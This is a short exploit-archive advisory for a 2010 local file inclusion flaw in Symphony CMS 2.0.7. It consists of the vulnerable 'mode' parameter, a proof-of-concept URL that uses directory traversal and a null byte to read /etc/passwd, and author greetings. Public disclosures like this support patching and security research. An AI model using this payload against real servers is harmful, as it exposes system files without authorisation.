Symphony CMS Local File Inclusion Vulnerability



EDB-ID: 12809 CVE: 2010-2143 OSVDB-ID: 65118
Author: AntiSecurity Published: 2010-05-30 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next 
=============================================================================================================


  [o] Symphony CMS Local File Inclusion Vulnerability

       Software : Symphony CMS version 2.0.7
       Download : http://symphony-cms.com/download/releases/current/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?mode=[LFI]


  [o] PoC

       http://localhost/index.php?mode=../../../../../../../../../../../../../../../etc/passwd%00


=============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella Genex
       H312Y }^-^{ matthews wishnusakti xrootboy
       k1tk4t str0ke kaka11 inc0mp13te pizzyroot
       ArRay bjork xmazinha veter f1
       all people in #evilc0de [at] irc.byroe.net


=============================================================================================================


  [o] May 30 2010 - GMT +07:00 Jakarta, Indonesia






Comments

No comments so far